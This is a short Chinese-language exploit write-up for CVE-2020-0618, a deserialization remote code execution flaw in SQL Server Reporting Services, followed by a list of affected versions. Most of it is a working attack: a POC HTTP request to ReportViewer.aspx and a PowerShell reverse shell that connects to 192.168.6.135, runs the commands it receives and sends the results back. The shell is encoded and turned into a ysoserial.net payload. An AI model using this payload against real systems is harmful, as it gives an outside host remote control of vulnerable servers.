CVE-2020-0618 SQL Server远程代码执行

1.简介

SQL Server Reporting Services（SSRS）提供了一组本地工具和服务，用于创建，部署和管理移动报告和分页报告。

SSRS Web应用程序中的功能允许低特权用户帐户通过利用反序列化问题在服务器上运行代码。（也就是说需要一定的权限，低权限账户且为浏览器角色即可。）

2.POC

POST /ReportServer/pages/ReportViewer.aspx HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
Content-Length: X

NavigationCorrector$PageState=NeedsCorrection&NavigationCorrector$ViewState=[PayloadHere]&__VIEWSTATE=

可以在PowerShell中使用以下命令来使用ysoserial.net工具生成payload

$command = '$client = New-Object System.Net.Sockets.TCPClient("192.168.6.135",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)

$encodedCommand = [Convert]::ToBase64String($bytes)

.\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip

3.影响版本

SQL Server 2016 Service Pack 2(GDR)	13.0.5026.0 - 13.0.5101.9	KB4505220
SQL Server 2016 Service Pack 2 CU11	13.0.5149.0 - 13.0.5598.27	KB4527378
SQL Server 2014 Service Pack 3 (GDR)	12.0.6024.0 - 12.0.6108.1	KB4505218
Server 2014 Service Pack 2 CU4	12.0.6205.1 - 12.0.6329.1	        KB4500181
SQL Server 2012 Service Pack 4 (QFE)	111.0.7001.0 - 11.0.7462.6	KB4057116